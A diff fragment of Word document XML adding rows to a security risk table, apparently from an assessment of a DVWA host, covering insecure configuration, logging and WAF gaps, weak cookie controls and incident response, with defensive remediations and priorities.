+              </w:rPr>
+              <w:t>Critical</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Plan and perform upgrade/migration to supported OS and supported PHP/MySQL/Apache versions; if not possible immediately, isolate the host from production network and add compensating controls.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>High</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>P0</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="636"/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t xml:space="preserve">7. Application insecure config (DVWA </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>security=low</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> or similar)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Business logic abuse, trivial exploitability</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>High</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>High</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> (in production)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Enforce secure config; disable debugging/vulnerable modes; use secure cookies, CSRF tokens, input validation.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Low</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>P0</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="820"/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>8. Insufficient logging/monitoring &amp; WAF gaps</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Long detection windows → larger impact</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>High</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Medium → High</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Enable/automate anomaly detection for DB queries (large/time-based queries), WAF tuned to block typical SQLi patterns (SLEEP, repeated error patterns), centralized logging and alerts for high-risk DB queries.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Medium</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>P1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="600"/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>9. Weak session/cookie controls (observed PHPSESSID + low security)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Session hijacking, CSRF</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Medium</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Medium</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Set </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>HttpOnly</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Secure</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>SameSite</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> on cookies; shorten session lifetimes; regenerate session IDs on auth.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Low</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>P2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="400"/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>10. Lack of incident response controls</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
